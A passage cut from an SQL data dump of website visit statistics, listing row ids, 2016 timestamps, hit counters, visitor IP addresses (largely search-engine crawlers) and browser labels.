99,1465065823,2,0,2,0,'66.249.78.171',''),(42200,1465066172,1,1,0,0,'178.154.189.202','other'),(42201,1465066374,1,1,0,0,'193.194.127.217','firefox'),(42202,1465067751,1,1,0,0,'141.8.142.67','other'),(42203,1465068689,1,1,0,0,'207.46.13.46','other'),(42204,1465069182,2,0,2,0,'66.249.78.164',''),(42205,1465069227,2,0,2,0,'66.249.66.188',''),(42206,1465069261,1,0,1,0,'66.249.66.183',''),(42207,1465070511,1,0,1,0,'66.249.78.178',''),(42208,1465070909,1,1,0,0,'130.193.50.6','other'),(42209,1465070933,1,0,1,0,'66.249.66.177',''),(42210,1465072438,1,0,1,0,'66.249.78.143',''),(42211,1465074164,1,0,1,0,'66.249.78.164',''),(42212,1465074544,1,1,0,0,'141.8.142.61','other'),(42213,1465074736,1,1,0,0,'141.8.132.10','other'),(42214,1465074999,1,0,1,0,'66.249.78.171',''),(42215,1465075068,1,1,0,0,'77.52.180.238','chrome'),(42216,1465075269,1,0,1,0,'66.249.78.164',''),(42217,1465076445,1,0,1,0,'66.249.66.183',''),(42218,1465076940,1,0,1,0,'66.249.78.171',''),(42219,1465076975,1,0,1,0,'66.249.78.164',''),(42220,1465077477,1,0,1,0,'66.249.78.136',''),(42221,1465077687,1,1,0,0,'178.154.189.203','other'),(42222,1465078251,1,1,0,0,'141.8.183.19','other'),(42223,1465078716,1,0,1,0,'66.249.78.164',''),(42224,1465079632,2,0,2,0,'66.249.78.164',''),(42225,1465079654,1,1,0,0,'141.8.183.25','other'),(42226,1465081648,1,0,1,0,'66.249.78.178',''),(42227,1465081786,2,0,2,0,'66.249.78.143',''),(42228,1465082195,1,1,0,0,'130.193.50.4','other'),(42229,1465082201,1,0,1,0,'66.249.78.171',''),(42230,1465082714,1,0,1,0,'66.249.78.178',''),(42231,1465083380,2,0,2,0,'66.249.78.171',''),(42232,1465083621,1,1,0,0,'157.55.39.20','other'),(42233,1465083623,2,0,2,0,'66.249.78.164',''),(42234,1465083694,2,0,2,0,'66.249.78.178',''),(42235,1465084470,2,0,2,0,'66.249.78.136',''),(42236,1465084550,2,0,2,0,'66.249.78.164',''),(42237,1465085115,1,1,0,0,'178.154.189.31','other'),(42238,1465085118,1,0,1,0,'66.249.78.171',''),(42239,1465085820,1,0,1,0,'66.249.66.183',''),(42240,1465087649,2,0,2,0,'66.249.78.178',''),(42241,1465088017,1,0,1,0,'66.249.78.171',''),(42242,1465088536,1,0,1,0,'66.249.66.188',''),(42243,1465088914,1,1,0,0,'130.193.51.19','other'),(42244,1465089119,2,2,0,0,'130.193.50.34','other'),(42245,1465089142,1,0,1,0,'66.249.78.164',''),(42246,1465090119,1,1,0,0,'207.46.13.118','other'),(42247,1465090497,1,0,1,0,'66.249.66.180',''),(42248,1465091104,1,0,1,0,'66.249.78.136',''),(42249,1465091510,1,0,1,0,'66.249.78.171',''),(42250,1465091530,1,0,1,0,'66.249.78.178',''),(42251,1465091543,1,0,1,0,'66.249.78.164',''),(42252,1465092362,1,0,1,0,'66.249.78.228',''),(42253,1465092429,3,0,3,0,'66.249.78.171',''),(42254,1465093207,2,0,2,0,'66.249.78.164',''),(42255,1465093230,1,0,1,0,'66.249.66.177',''),(42256,1465093425,2,0,2,0,'66.249.78.143',''),(42257,1465093429,2,0,2,0,'66.249.78.171',''),(42258,1465094520,1,0,1,0,'66.249.78.143',''),(42259,1465094879,1,0,1,0,'66.249.78.164',''),(42260,1465095000,2,2,0,0,'92.113.210.183','chrome'),(42261,1465095757,2,0,2,0,'66.249.78.178',''),(42262,1465095892,1,1,0,0,'178.154.189.202','other'),(42263,1465096198,1,0,1,0,'66.249.78.171',''),(42264,1465096936,1,1,0,0,'66.249.78.178','chrome'),(42265,1465097645,1,1,0,0,'141.8.183.25','other'),(42266,1465097779,1,0,1,0,'66.249.66.183',''),(42267,1465097783,1,0,1,0,'66.249.78.171',''),(42268,1465098274,1,0,1,0,'66.249.66.185',''),(42269,1465098385,1,0,1,0,'68.180.229.171',''),(42270,1465099263,1,0,1,0,'66.249.78.171',''),(42271,1465099517,1,0,1,0,'66.249.78.178',''),(42272,1465099980,1,1,0,0,'141.8.142.67','other'),(42273,1465101180,1,0,1,0,'66.249.78.171',''),(42274,1465101444,2,0,2,0,'66.249.66.177',''),(42275,1465101471,4,1,3,0,'66.249.78.164',''),(42276,1465101849,1,0,1,0,'66.249.78.178',''),(42277,1465101868,1,0,1,0,'66.249.66.180',''),(42278,1465102447,1,1,0,0,'82.145.217.206','other'),(42279,1465102575,1,1,0,0,'130.193.51.19','other'),(42280,1465102909,1,0,1,0,'66.249.66.180',''),(42281,1465103330,1,0,1,0,'66.249.66.177',''),(42282,1465104117,1,1,0,0,'130.193.51.19','other'),(42283,1465104429,1,0,1,0,'66.249.78.143',''),(42284,1465104509,2,0,2,0,'66.249.78.171',''),(42285,1465104548,1,0,1,0,'66.249.66.183',''),(42286,1465105609,1,0,1,0,'66.249.78.164',''),(42287,1465106502,2,0,2,0,'66.249.78.171',''),(42288,1465108554,1,0,1,0,'66.249.78.164',''),(42289,1465108697,3,0,3,0,'66.249.78.171',''),(42290,1465109237,1,1,0,0,'66.249.78.164','chrome'),(42291,1465109685,1,0,1,0,'66.249.78.136',''),(42292,1465109966,2,0,2,0,'66.249.78.171',''),(42293,1465110525,2,0,2,0,'66.249.78.178',''),(42294,1465110839,1,0,1,0,'66.249.78.136',''),(42295,1465111807,2,1,1,0,'66.249.66.177',''),(42296,1465112155,1,1,0,0,'66.249.78.164','chrome'),(42297,1465112418,1,1,0,0,'199.58.86.209','other'),(42298,1465112723,1,0,1,0,'66.249.78.178',''),(42299,1465113504,1,1,0,0,'66.249.93.153','chrome'),(42300,1465114012,1,1,0,0,'141.8.142.61','other'),(42301,1465114119,1,1,0,0,'94.179.246.43','firefox'),(42302,1465114298,1,0,1,0,'66.249.66.183',''),(42303,1465114403,1,0,1,0,'66.249.78.178',''),(42304,1465114513,4,0,4,0,'66.249.78.164',''),(42305,1465115022,1,0,1,0,'66.249.66.182',''),(42306,1465115454,1,0,1,0,'66.249.78.171',''),(42307,1465116434,1,0,1,0,'66.249.78.178',''),(42308,1465116962,1,0,1,0,'66.249.78.171',''),(42309,1465117011,1,0,1,0,'66.249.78.164',''),(42310,1465117234,1,1,0,0,'141.8.142.61','other'),(42311,1465117657,1,0,1,0,'66.249.66.180',''),(42312,1465117722,1,0,1,0,'66.249.78.136',''),(42313,1465117852,1,0,1,0,'66.249.78.178',''),(42314,1465118687,1,0,1,0,'66.249.78.150',''),(42315,1465119132,1,1,0,0,'130.193.51.19','other'),(42316,1465119335,1,0,1,0,'66.249.66.183',''),(42317,1465119508,1,1,0,0,'180.76.15.137','other'),(42318,1465120065,1,0,1,0,'66.249.78.178',''),(42319,1465120821,1,1,0,0,'157.55.39.106','other'),(42320,1465121693,1,0,1,0,'66.249.66.177',''),(42321,1465121723,2,0,2,0,'66.249.78.178',''),(42322,1465122059,2,0,2,0,'66.249.78.171',''),(42323,1465122066,3,0,3,0,'66.249.78.164',''),(42324,1465122199,1,1,0,0,'188.231.235.50','other'),(42325,1465123144,1,1,0,0,'141.8.183.25','other'),(42326,1465124309,2,0,2,0,'68.180.229.171',''),(42327,1465124399,2,0,2,0,'66.249.66.177',''),(42328,1465124401,2,0,2,0,'66.249.78.171',''),(42329,1465124463,1,1,0,0,'141.8.142.67','other'),(42330,1465124573,1,0,1,0,'66.249.78.143',''),(42331,1465125017,1,1,0,0,'51.255.65.31','other'),(42332,1465125476,1,1,0,0,'95.15.146.227','other'),(42333,1465125598,1,0,1,0,'66.249.66.183',''),(42334,1465125983,1,0,1,0,'66.249.78.136',''),(42335,1465127050,1,0,1,0,'66.249.66.180',''),(42336,1465127346,1,0,1,0,'66.249.66.183',''),(42337,1465127527,1,0,1,0,'66.249.78.164',''),(42338,1465127802,1,0,1,0,'66.249.66.188',''),(42339,1465127867,1,0,1,0,'66.249.78.178',''),(42340,1465128322,1,0,1,0,'66.249.78.150',''),(42341,1465128516,1,1,0,0,'130.193.50.34','other'),(42342,1465129897,1,1,0,0,'178.154.189.203','other'),(42343,1465130308,1,0,1,0,'66.249.78.178',''),(42344,1465131164,4,0,4,0,'66.249.78.171',''),(42345,1465131249,1,0,1,0,'66.249.78.178',''),(42346,1465132052,1,0,1,0,'66.249.78.164',''),(42347,1465132826,1,1,0,0,'94.179.246.43','firefox'),(42348,1465133406,1,0,1,0,'66.249.78.171',''),(42349,1465133842,2,0,2,0,'66.249.78.164',''),(42350,1465133915,1,0,1,0,'66.249.78.143',''),(42351,1465134079,1,0,1,0,'66.249.78.178',''),(42352,1465134985,2,0,2,0,'66.249.78.164',''),(42353,1465135924,2,0,2,0,'66.249.78.178',''),(42354,1465136202,1,0,1,0,'66.249.78.164',''),(42355,1465136378,2,0,2,0,'66.249.78.171',''),(42356,1465136553,1,0,1,0,'66.249.66.185',''),(42357,1465137393,1,1,0,0,'178.154.189.202','other'),(42358,1465139810,1,0,1,0,'66.249.66.180',''),(42359,1465141148,1,0,1,0,'66.249.78.150',''),(42360,1465142539,1,0,1,0,'66.249.78.150',''),(42361,1465142545,1,0,1,0,'66.249.78.171',''),(42362,1465143380,1,0,1,0,'66.249.78.178',''),(42363,1465143467,1,0,1,0,'66.249.78.164',''),(42364,1465144452,1,0,1,0,'66.249.78.164',''),(42365,1465144652,1,0,1,0,'66.249.78.136',''),(42366,1465145198,1,0,1,0,'66.249.78.178',''),(42367,1465145227,1,0,1,0,'66.249.78.171',''),(42368,1465145837,1,1,0,0,'93.158.152.40','other'),(42369,1465145908,2,0,2,0,'66.249.66.188',''),(42370,1465146043,1,0,1,0,'66.249.78.164',''),(42371,1465146560,1,0,1,0,'66.249.78.178',''),(42372,1465147404,2,0,2,0,'66.249.78.171',''),(42373,1465148304,1,0,1,0,'66.249.66.177',''),(42374,1465148323,1,1,0,0,'178.154.189.203','other'),(42375,1465148413,1,0,1,0,'66.249.66.183',''),(42376,1465149360,1,1,0,0,'91.196.178.167','firefox'),(42377,1465149977,1,1,0,0,'130.193.50.34','other'),(42378,1465150605,1,0,1,0,'66.249.78.178',''),(42379,1465151805,1,0,1,0,'66.249.78.171',''),(42380,1465151853,1,0,1,0,'66.249.66.177',''),(42381,1465151912,1,0,1,0,'66.249.66.183',''),(42382,1465152029,3,0,3,0,'66.249.78.164',''),(42383,1465152798,1,0,1,0,'66.249.78.143',''),(42384,1465153127,1,0,1,0,'66.249.78.171',''),(42385,1465153525,2,0,2,0,'66.249.66.177',''),(42386,1465154153,1,1,0,0,'91.196.178.65','firefox'),(42387,1465154163,2,0,2,0,'66.249.78.171',''),(42388,1465154581,1,1,0,0,'141.8.183.19','other'),(42389,1465154624,1,1,0,0,'91.226.252.71','chrome'),(42390,1465154829,1,1,0,0,'207.46.13.161','other'),(42391,1465154963,2,0,2,0,'66.249.78.178',''),(42392,1465155261,1,1,0,0,'5.255.253.68','other'),(42393,1465155409,2,2,0,0,'130.193.50.34','other'),(42394,1465155541,1,1,0,0,'130.193.51.19','other'),(42395,1465156132,1,1,0,0,'130.193.51.79','other'),(42396,1465156216,1,0,1,0,'66.249.78.178',''),(42397,1465158138,1,1,0,0,'178.154.189.37','other'),(42398,1465158263,1,0,1,0,'66.249.78.150',''),(42399,1465158378,1,0,1,0,'66.249.78.164',''),(42400,1465158428,1,0,1,0,'66.249.66.183',''),(42401,1465158890,1,0,1,0,'66.249.78.143',''),(42402,1465160780,1,0,1,0,'66.249.78.164',''),(42403,1465161303,1,1,0,0,'66.249.78.143','chrome'),(42404,1465161407,1,0,1,0,'66.249.78.171',''),(42405,1465161536,2,2,0,0,'93.158.152.84','other'),(42406,1465161790,1,1,0,0,'141.8.142.67','other'),(42407,1465161838,1,1,0,0,'66.249.66.177','chrome'),(42408,1465162079,2,0,2,0,'66.249.78.164',''),(42409,1465162449,1,0,1,0,'66.249.78.171',''),(42410,1465162785,2,0,2,0,'66.249.78.178',''),(42411,1465162895,1,0,1,0,'66.249.78.150',''),(42412,1465164508,1,1,0,0,'130.193.50.34','other'),(42413,1465164732,1,1,0,0,'141.8.142.58','other'),(42414,1465166190,1,0,1,0,'66.249.78.164',''),(42415,1465167196,2,1,1,0,'66.249.78.171',''),(42416,1465167910,1,0,1,0,'66.249.78.164',''),(42417,1465168622,1,1,0,0,'180.76.15.145','other'),(42418,1465169002,1,0,1,0,'66.249.78.171',''),(42419,1465169832,1,0,1,0,'66.249.78.164',''),(42420,1465169893,1,0,1,0,'66.249.66.183',''),(42421,1465170092,1,0,1,0,'66.249.66.180',''),(42422,1465170211,1,0,1,0,'66.249.78.178',''),(42423,1465170916,4,0,4,0,'66.249.78.164',''),(42424,1465171463,1,0,1,0,'66.249.78.136',''),(42425,1465173019,1,1,0,0,'141.8.183.25','other'),(42426,1465173155,1,1,0,0,'130.193.51.19','other'),(42427,1465173350,1,1,0,0,'93.158.152.51','other'),(42428,1465173857,1,0,1,0,'66.249.78.164',''),(42429,1465175352,2,0,2,0,'66.249.78.178',''),(42430,1465175514,1,0,1,0,'66.249.78.164',''),(42431,1465176083,1,0,1,0,'66.249.78.171',''),(42432,1465177027,1,0,1,0,'66.249.78.136',''),(42433,1465177223,1,1,0,0,'66.249.66.177','chrome'),(42434,1465177751,2,0,2,0,'66.249.78.178',''),(42435,1465177939,2,0,2,0,'66.249.66.180',''),(42436,1465177943,1,0,1,0,'66.249.78.164',''),(42437,1465178230,1,0,1,0,'66.249.78.171',''),(42438,1465178642,1,0,1,0,'66.249.66.183',''),(42439,1465178835,1,0,1,0,'66.249.78.240',''),(42440,1465179810,1,1,0,0,'157.55.39.210','other'),(42441,1465180032,1,1,0,0,'93.158.152.84','other'),(42442,1465180058,1,1,0,0,'130.193.37.7','other'),(42443,1465180100,2,0,2,0,'66.249.78.178',''),(42445,1465180329,1,1,0,0,'141.8.142.67','other'),(42446,1465180674,2,0,2,0,'66.249.78.171',''),(42447,1465181096,1,1,0,0,'130.193.50.34','other'),(42448,1465181171,3,0,3,0,'66.249.78.178',''),(42449,1465181174,1,0,1,0,'66.249.78.150',''),(42450,1465181286,1,0,1,0,'66.249.78.143',''),(42451,1465181403,1,1,0,0,'130.193.51.79','other'),(42452,1465181630,2,0,2,0,'66.249.78.171',''),(42453,1465181907,1,1,0,0,'94.231.188.10','firefox'),(42454,1465182816,1,1,0,0,'141.8.142.61','other'),(42455,1465182942,1,1,0,0,'141.8.183.25','other'),(42456,1465183069,1,1,0,0,'130.193.51.19','other'),(42457,1465183265,1,0,1,0,'66.249.78.150',''),(42458,1465184538,1,0,1,0,'66.249.78.164',''),(42459,1465184568,1,1,0,0,'66.249.66.182','chrome'),(42460,1465185941,1,0,1,0,'66.249.78.136',''),(42461,1465186110,4,0,4,0,'66.249.78.178',''),(42462,1465186122,1,0,1,0,'66.249.66.188',''),(42463,1465186655,1,1,0,0,'130.193.51.19','other'),(42464,1465187236,1,1,0,0,'141.8.183.19','other'),(42465,1465187552,1,0,1,0,'66.249.66.180',''),(42466,1465187684,1,0,1,0,'66.249.78.136',''),(42467,1465188999,1,0,1,0,'66.249.78.143',''),(42468,1465189592,2,0,2,0,'66.249.78.171',''),(42469,1465189688,1,0,1,0,'66.249.78.164',''),(42470,1465190587,2,0,2,0,'66.249.78.178',''),(42471,1465190822,1,0,1,0,'66.249.78.150',''),(42472,1465191226,2,0,2,0,'66.249.78.171',''),(42473,1465191627,1,0,1,0,'66.249.78.164',''),(42474,1465192011,1,0,1,0,'66.249.78.178',''),(42475,1465193479,2,0,2,0,'66.249.78.178',''),(42476,1465193480,1,1,0,0,'66.249.93.150','chrome'),(42477,1465193519,1,0,1,0,'66.249.66.180',''),(42478,1465193618,1,1,0,0,'87.238.152.68','chrome'),(42479,1465193713,1,1,0,0,'94.153.208.7','chrome'),(42480,1465193732,1,0,1,0,'66.249.78.171',''),(42481,1465193821,1,0,1,0,'66.249.78.164',''),(42482,1465194388,1,0,1,0,'66.249.78.136',''),(42485,1465195418,1,0,1,0,'66.249.78.164',''),(42486,1465196042,1,0,1,0,'66.249.78.178',''),(42487,1465196199,1,1,0,0,'46.188.26.225','msie'),(42489,1465196200,1,1,0,0,'37.204.97.218','chrome'),(42490,1465196295,1,1,0,0,'95.133.197.45','chrome'),(42491,1465196900,1,1,0,0,'178.95.211.205','opera'),(42492,1465197111,1,1,0,0,'66.249.78.164','chrome'),(42493,1465198046,2,0,2,0,'66.249.66.180',''),(42494,1465198186,1,1,0,0,'82.207.91.234','firefox'),(42495,1465198191,1,0,1,0,'66.249.78.171',''),(42496,1465198363,1,0,1,0,'66.249.78.150',''),(42497,1465198534,2,0,2,0,'66.249.66.177',''),(42498,1465198698,1,1,0,0,'46.201.251.30','firefox'),(42499,1465198722,1,1,0,0,'141.8.142.58','other'),(42500,1465199260,1,1,0,0,'95.134.35.186','msie'),(42501,1465199590,1,0,1,0,'66.249.78.143',''),(42502,1465200268,2,0,2,0,'66.249.78.164',''),(42503,1465200406,1,0,1,0,'66.249.78.178',''),(42504,1465200472,1,0,1,0,'66.249.66.180',''),(42505,1465201052,1,1,0,0,'46.201.175.168','firefox'),(42506,1465201053,1,1,0,0,'130.193.51.19','other'),(42507,1465201169,1,1,0,0,'91.196.178.70','firefox'),(42508,1465201528,1,0,1,0,'66.249.78.164',''),(42509,1465202126,2,2,0,0,'91.196.178.66','chrome'),(42510,1465202142,1,1,0,0,'130.193.51.19','other'),(42511,1465203083,1,1,0,0,'91.196.178.168','chrome'),(42512,1465203237,1,0,1,0,'66.249.78.171',''),(42513,1465203675,1,0,1,0,'66.249.78.143',''),(42514,1465203876,1,1,0,0,'130.193.51.19','other'),(42515,1465204141,2,0,2,0,'66.249.66.177',''),(42516,1465204281,1,1,0,0,'141.8.142.61','other'),(42517,1465204656,1,1,0,0,'82.207.91.234','firefox'),(42518,1465205188,1,1,0,0,'92.112.89.140','firefox'),(42519,1465205858,1,1,0,0,'37.55.56.194','chrome'),(42520,1465205860,1,1,0,0,'207.46.13.134','other'),(42521,1465205975,1,1,0,0,'91.196.178.69','firefox'),(42522,1465206057,2,0,2,0,'66.249.78.171',''),(42523,1465206326,1,0,1,0,'66.249.66.180',''),(42524,1465206692,1,1,0,0,'46.200.27.201','opera'),(42525,1465206811,2,0,2,0,'66.249.78.164',''),(42526,1465207650,1,1,0,0,'91.196.178.72','firefox'),(42527,1465208449,1,1,0,0,'66.249.78.171','chrome'),(42528,1465208835,1,1,0,0,'178.154.189.202','other'),(42529,1465210231,1,1,0,0,'91.196.178.166','chrome'),(42530,1465210386,1,1,0,0,'207.46.13.95','other'),(42531,1465211867,1,1,0,0,'130.193.51.19','other'),(42532,1465211993,1,0,1,0,'66.249.78.136',''),(42533,1465212133,1,1,0,0,'91.196.178.72','firefox'),(42534,1465212346,1,1,0,0,'94.178.87.253','chrome'),(42535,1465212927,1,0,1,0,'66.249.78.178',''),(42536,1465213414,2,0,2,0,'66.249.78.136',''),(42537,1465213419,1,0,1,0,'66.249.78.171',''),(42538,1465213814,1,0,1,0,'66.249.78.143',''),(42539,1465214143,1,1,0,0,'46.200.127.170','chrome'),(42540,1465214262,1,1,0,0,'91.196.178.166','chrome'),(42541,1465214619,1,1,0,0,'91.196.178.69','firefox'),(42542,1465215599,1,0,1,0,'66.249.78.164',''),(42543,1465215653,1,1,0,0,'130.193.51.74','other'),(42544,1465215764,1,1,0,0,'178.93.244.149','chrome'),(42545,1465215832,1,0,1,0,'66.249.66.185',''),(42546,1465216089,1,1,0,0,'180.76.15.140','other'),(42547,1465216193,1,0,1,0,'66.249.78.171',''),(42548,1465216380,1,1,0,0,'82.207.120.115','firefox'),(42549,1465216908,1,0,1,0,'66.249.78.164',''),(42550,1465217305,1,1,0,0,'207.46.13.95','other'),(42551,1465217372,1,1,0,0,'46.219.23.9','firefox'),(42552,1465218353,1,0,1,0,'66.249.78.178',''),(42553,1465219565,1,1,0,0,'46.201.175.168','firefox'),(42554,1465219967,3,0,3,0,'66.249.78.178',''),(42555,1465220051,1,1,0,0,'94.158.95.20','chrome'),(42556,1465220723,1,0,1,0,'66.249.78.171',''),(42557,1465220985,2,0,2,0,'66.249.78.164',''),(42558,1465222021,1,1,0,0,'66.249.78.164','chrome'),(42559,1465222115,1,1,0,0,'91.222.248.122','chrome'),(42560,1465222355,2,0,2,0,'66.249.78.171',''),(42561,1465222489,1,1,0,0,'188.163.19.7','chrome'),(42562,1465222702,1,1,0,0,'91.196.178.66','firefox'),(42563,1465223282,1,0,1,0,'66.249.66.183',''),(42564,1465223930,1,1,0,0,'178.154.189.202','other'),(42565,1465224018,1,0,1,0,'66.249.78.171',''),(42566,1465224789,1,1,0,0,'207.46.13.134','other'),(42567,1465227989,1,1,0,0,'94.179.246.43','firefox'),(42568,1465228194,1,1,0,0,'141.8.142.61','other'),(42569,1465228464,1,0,1,0,'66.249.78.164',''),(42570,1465228554,1,0,1,0,'66.249.78.171',''),(42571,1465228823,1,1,0,0,'69.30.198.242','other'),(42572,1465229553,1,0,1,0,'66.249.78.171',''),(42573,1465229570,1,1,0,0,'180.76.15.17','other'),(42574,1465230086,1,1,0,0,'94.179.2.129','firefox'),(42575,1465230120,1,1,0,0,'141.8.183.25','other'),(42576,1465230262,1,0,1,0,'66.249.78.178',''),(42577,1465230653,1,0,1,0,'66.249.78.136',''),(42578,1465231440,1,1,0,0,'37.187.129.166','chrome'),(42579,1465232144,1,1,0,0,'176.36.80.39','other'),(42580,1465232189,2,0,2,0,'66.249.78.178',''),(42581,1465232650,1,1,0,0,'141.8.183.25','other'),(42582,1465232997,1,0,1,0,'66.249.78.171',''),(42583,1465233997,1,1,0,0,'82.145.208.180','other'),(42584,1465234124,1,1,0,0,'46.188.82.224','msie'),(42585,1465234125,1,1,0,0,'128.68.5.240','msie'),(42586,1465234135,1,1,0,0,'188.32.244.21','msie'),(42587,1465235302,1,1,0,0,'157.55.39.210','other'),(42588,1465235374,1,0,1,0,'66.249.78.171',''),(42589,1465235953,1,0,1,0,'66.249.66.188',''),(42590,1465236581,1,0,1,0,'66.249.66.182',''),(42591,1465236728,3,0,3,0,'66.249.78.171',''),(42592,1465237538,1,0,1,0,'66.249.78.164',''),(42593,1465237699,1,1,0,0,'93.126.106.144','chrome'),(42594,1465237850,2,2,0,0,'69.30.214.38','other'),(42595,1465238688,1,1,0,0,'91.196.178.66','firefox'),(42596,1465238949,1,0,1,0,'66.249.66.183',''),(42597,1465239159,1,0,1,0,'66.249.78.136',''),(42598,1465239491,1,0,1,0,'66.249.78.164',''),(42599,1465239607,1,0,1,0,'66.249.78.178',''),(42600,1465239937,1,1,0,0,'193.194.127.217','firefox'),(42601,1465240760,1,1,0,0,'94.179.127.78','firefox'),(42602,1465241113,1,1,0,0,'141.8.142.61','other'),(42603,1465241115,1,1,0,0,'141.8.183.25','other'),(42604,1465241571,1,0,1,0,'66.249.78.164',''),(42605,1465242253,1,0,1,0,'66.249.78.136',''),(42606,1465244906,1,1,0,0,'207.46.13.134','other'),(42607,1465245547,2,0,2,0,'66.249.78.171',''),(42608,1465246071,1,0,1,0,'66.249.66.177',''),(42609,1465247044,1,0,1,0,'66.249.78.178',''),(42610,1465247072,1,0,1,0,'66.249.78.150',''),(42611,1465247956,2,0,2,0,'66.249.78.171',''),(42612,1465249482,2,0,2,0,'66.249.78.178',''),(42613,1465249589,1,0,1,0,'66.249.78.164',''),(42614,1465249916,1,0,1,0,'66.249.78.136',''),(42615,1465250153,1,0,1,0,'66.249.78.171',''),(42616,1465250419,1,0,1,0,'66.249.78.178',''),(42617,1465250899,1,0,1,0,'66.249.66.177',''),(42618,1465251199,2,0,2,0,'66.249.78.171',''),(42619,1465251386,1,1,0,0,'141.8.183.19','other'),(42620,1465251885,1,0,1,0,'66.249.78.178',''),(42621,1465252596,1,0,1,0,'66.249.78.136',''),(42622,1465253856,1,1,0,0,'66.249.78.178','chrome'),(42623,1465253981,1,1,0,0,'66.249.78.150','chrome'),(42624,1465254131,1,0,1,0,'66.249.78.171',''),(42625,1465254324,1,0,1,0,'66.249.78.164',''),(42626,1465255103,1,0,1,0,'66.249.78.136',''),(42627,1465255236,1,0,1,0,'66.249.66.177',''),(42628,1465255591,1,1,0,0,'66.249.78.178','chrome'),(42629,1465256150,2,0,2,0,'66.249.78.136',''),(42630,1465257188,1,0,1,0,'66.249.78.178',''),(42631,1465257832,1,0,1,0,'66.249.78.164',''),(42632,1465258084,1,0,1,0,'66.249.66.177',''),(42633,1465258630,1,0,1,0,'66.249.66.188',''),(42634,1465259158,2,0,2,0,'66.249.78.171',''),(42635,1465259782,2,0,2,0,'66.249.78.164',''),(42636,1465260510,1,0,1,0,'66.249.78.143',''),(42637,1465260784,1,0,1,0,'66.249.66.188',''),(42638,1465260899,1,1,0,0,'130.193.51.19','other'),(42639,1465262113,1,0,1,0,'66.249.66.180',''),(42640,1465262348,2,0,2,0,'66.249.78.171',''),(42641,1465262885,1,0,1,0,'66.249.78.164',''),(42642,1465263941,1,0,1,0,'66.249.78.178',''),(42643,1465264199,1,0,1,0,'66.249.78.164',''),(42644,1465265087,1,0,1,0,'66.249.78.136',''),(42645,1465265529,2,0,2,0,'66.249.78.164',''),(42646,1465265620,2,0,2,0,'66.249.78.178',''),(42647,1465265964,1,0,1,0,'66.249.78.171',''),(42648,1465267065,1,0,1,0,'66.249.78.220',''),(42649,1465267138,2,0,2,0,'66.249.78.171',''),(42650,1465267374,1,0,1,0,'66.249.78.164',''),(42651,1465270583,1,0,1,0,'66.249.78.143',''),(42652,1465270740,2,0,2,0,'66.249.78.164',''),(42653,1465270903,1,0,1,0,'66.249.78.171',''),(42654,1465271029,1,0,1,0,'66.249.66.177',''),(42655,1465271528,1,0,1,0,'66.249.66.180',''),(42656,1465271801,1,0,1,0,'66.249.78.150',''),(42657,1465272966,1,0,1,0,'66.249.78.164',''),(42658,1465273306,2,0,2,0,'66.249.78.171',''),(42659,1465273887,2,0,2,0,'66.249.78.178',''),(42660,1465274049,1,1,0,0,'130.193.51.79','other'),(42661,1465274468,1,1,0,0,'141.8.183.25','other'),(42662,1465274603,3,0,3,0,'66.249.78.171',''),(42663,1465274833,2,0,2,0,'66.249.78.178',''),(42664,1465274896,2,0,2,0,'66.249.66.180',''),(42665,1465274983,1,0,1,0,'66.249.78.164',''),(42666,1465276130,1,1,0,0,'91.196.178.67','chrome'),(42667,1465276607,1,0,1,0,'66.249.66.185',''),(42668,1465276922,1,0,1,0,'66.249.78.150',''),(42669,1465277255,1,0,1,0,'66.249.78.143',''),(42670,1465278223,1,0,1,0,'66.249.66.180',''),(42671,1465278549,1,1,0,0,'95.133.197.45','chrome'),(42672,1465278646,1,0,1,0,'66.249.78.164',''),(42673,1465278736,1,0,1,0,'66.249.78.171',''),(42674,1465278802,1,1,0,0,'46.200.127.23','chrome'),(42675,1465279588,2,0,2,0,'66.249.78.178',''),(42676,1465279853,1,1,0,0,'91.196.177.144','chrome'),(42677,1465280222,1,1,0,0,'31.134.112.253','opera'),(42678,1465280255,1,1,0,0,'46.164.154.74','chrome'),(42679,1465280309,1,1,0,0,'91.196.177.8','chrome'),(42680,1465280564,1,1,0,0,'91.196.178.70','firefox'),(42681,1465280597,1,0,1,0,'66.249.78.178',''),(42682,1465281322,1,1,0,0,'193.110.17.155','chrome'),(42683,1465281757,1,1,0,0,'178.93.29.253','firefox'),(42684,1465281933,1,0,1,0,'66.249.78.150',''),(42685,1465281965,3,0,3,0,'66.249.78.164',''),(42686,1465282306,2,0,2,0,'66.249.78.178',''),(42687,1465282463,1,1,0,0,'91.196.178.72','chrome'),(42688,1465282849,1,1,0,0,'91.196.178.69','firefox'),(42689,1465283073,1,0,1,0,'66.249.66.180',''),(42690,1465283260,2,0,2,0,'66.249.78.164',''),(42691,1465283329,1,1,0,0,'195.5.54.246','firefox'),(42692,1465284253,1,0,1,0,'66.249.78.178',''),(42693,1465284671,1,0,1,0,'66.249.66.185',''),(42694,1465285009,4,4,0,0,'69.30.198.202','other'),(42695,1465285471,1,1,0,0,'37.53.231.248','firefox'),(42696,1465285741,1,0,1,0,'66.249.78.164',''),(42697,1465285796,2,0,2,0,'66.249.78.171',''),(42698,1465285952,1,0,1,0,'66.249.66.180',''),(42699,1465286228,1,1,0,0,'91.196.178.72','firefox'),(42700,1465286436,1,1,0,0,'178.93.29.253','firefox'),(42701,1465286454,1,1,0,0,'130.193.50.34','other'),(42702,1465287063,1,0,1,0,'66.249.78.178',''),(42703,1465287153,1,0,1,0,'66.249.78.164',''),(42704,1465287597,2,0,2,0,'66.249.78.136',''),(42705,1465287733,2,2,0,0,'178.93.29.253','firefox'),(42706,1465287934,1,1,0,0,'93.73.234.193','firefox'),(42707,1465288430,1,0,1,0,'66.249.66.177',''),(42708,1465288576,2,0,2,0,'66.249.78.164',''),(42709,1465288662,1,0,1,0,'66.249.78.178',''),(42710,1465288744,1,0,1,0,'66.249.78.150',''),(42711,1465289608,1,1,0,0,'212.90.183.86','chrome'),(42712,1465289621,1,1,0,0,'91.192.132.242','firefox'),(42713,1465289776,1,0,1,0,'66.249.66.183',''),(42714,1465289884,4,4,0,0,'130.193.51.19','other'),(42715,1465290141,3,3,0,0,'141.8.183.25','other'),(42716,1465290169,4,4,0,0,'141.8.142.61','other'),(42717,1465290342,1,1,0,0,'193.19.152.14','chrome'),(42718,1465290401,2,2,0,0,'130.193.50.34','other'),(42719,1465290428,1,1,0,0,'93.158.152.40','other'),(42720,1465290465,1,0,1,0,'66.249.78.178',''),(42721,1465290476,1,1,0,0,'66.249.66.177','chrome'),(42722,1465290719,1,1,0,0,'91.196.178.69','firefox'),(42723,1465290908,2,2,0,0,'141.8.142.58','other'),(42724,1465291184,2,2,0,0,'141.8.142.61','other'),(42725,1465291208,1,1,0,0,'91.1